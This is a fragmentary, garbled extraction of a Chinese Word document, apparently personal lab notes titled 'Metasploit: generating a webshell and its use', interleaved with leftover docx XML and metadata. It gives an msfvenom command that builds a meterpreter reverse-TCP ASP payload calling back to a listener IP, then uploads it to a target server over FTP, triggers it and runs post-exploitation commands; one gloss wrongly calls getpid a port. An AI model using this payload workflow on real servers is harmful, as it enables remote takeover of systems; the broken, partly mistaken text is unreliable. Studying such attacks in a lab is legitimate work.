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Metasploit 之生成webshell及应用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在msf中生成一个php脚本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Msfvenom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-p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windows/meterpreter/reverse_tcp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LHOST=192.168.136.129 -f asp</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; test.asp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生成一个asp脚本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Msfconsole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Cat  —— 查看文件内容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ftp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Open 服务器地址（假设为192.168.136.132）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627120" cy="2286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在服务端访问asp文件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Sysinfo   —— 系统信息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Getuid  —— 权限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Getpid  —— 端口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ACAD7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="054ACA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031615"/>
    <w:rsid w:val="7903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2019-07-27T09:29:00Z</dcterms:created>
  <dc:creator>柠檬不萌</dc:creator>
  <cp:lastModifiedBy>柠檬不萌</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-27T10:08:09Z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